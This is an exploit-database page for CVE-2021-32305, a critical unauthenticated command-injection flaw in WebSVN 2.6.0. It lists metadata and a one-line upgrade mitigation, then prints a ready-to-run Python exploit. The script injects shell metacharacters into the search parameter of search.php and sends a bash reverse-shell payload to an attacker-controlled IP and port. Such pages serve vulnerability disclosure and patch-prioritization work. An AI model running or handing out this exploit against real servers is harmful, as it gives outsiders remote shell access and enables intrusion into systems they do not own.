header-logo
Suggest Exploit
vendor:
Websvn
by:
g0ldm45k
9,8
CVSS
CRITICAL
Remote Code Execution
78
CWE
Product Name: Websvn
Affected Version From: 2.6.0
Affected Version To: 2.6.0
Patch Exists: YES
Related CWE: CVE-2021-32305
CPE: 2.6.0
Metasploit: N/A
Other Scripts: https://www.infosecmatter.com/nessus-plugin-library/?id=32305https://www.infosecmatter.com/nessus-plugin-library/?id=65109https://www.infosecmatter.com/nessus-plugin-library/?id=32377https://www.infosecmatter.com/nessus-plugin-library/?id=65108https://www.infosecmatter.com/nessus-plugin-library/?id=32357https://www.infosecmatter.com/nessus-plugin-library/?id=32430https://www.infosecmatter.com/nessus-plugin-library/?id=32359https://www.infosecmatter.com/nessus-plugin-library/?id=31808https://www.infosecmatter.com/nessus-plugin-library/?id=32321
Tags: cve,cve2021,websvn,rce,oast,packetstorm
CVSS Metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Nuclei References: https://packetstormsecurity.com/files/163225/Websvn-2.6.0-Remote-Code-Execution.htmlhttps://github.com/websvnphp/websvn/pull/142http://packetstormsecurity.com/files/163225/Websvn-2.6.0-Remote-Code-Execution.htmlhttps://nvd.nist.gov/vuln/detail/CVE-2021-32305
Nuclei Metadata: {'max-request': 1, 'vendor': 'websvn', 'product': 'websvn'}
Platforms Tested: Docker + Debian GNU/Linux (Buster)
2021

Websvn 2.6.0 – Remote Code Execution (Unauthenticated)

WebSVN before 2.6.1 allows remote attackers to execute arbitrary commands via shell metacharacters in the search parameter.

Mitigation:

Upgrade to the latest version of Websvn, which is not vulnerable to this exploit.
Source

Exploit-DB raw data:

# Exploit Title: Websvn 2.6.0 - Remote Code Execution (Unauthenticated)
# Date: 20/06/2021
# Exploit Author: g0ldm45k
# Vendor Homepage: https://websvnphp.github.io/
# Software Link: https://github.com/websvnphp/websvn/releases/tag/2.6.0
# Version: 2.6.0
# Tested on: Docker + Debian GNU/Linux (Buster)
# CVE : CVE-2021-32305

import requests
import argparse
from urllib.parse import quote_plus

PAYLOAD = "/bin/bash -c 'bash -i >& /dev/tcp/192.168.1.149/4444 0>&1'"
REQUEST_PAYLOAD = '/search.php?search=";{};"'

parser = argparse.ArgumentParser(description='Send a payload to a websvn 2.6.0 server.')
parser.add_argument('target', type=str, help="Target URL.")

args = parser.parse_args()

if args.target.startswith("http://") or args.target.startswith("https://"):
    target = args.target
else:
    print("[!] Target should start with either http:// or https://")
    exit()

requests.get(target + REQUEST_PAYLOAD.format(quote_plus(PAYLOAD)))

print("[*] Request send. Did you get what you wanted?")

Navigation

Suggest Exploit

Services By CQR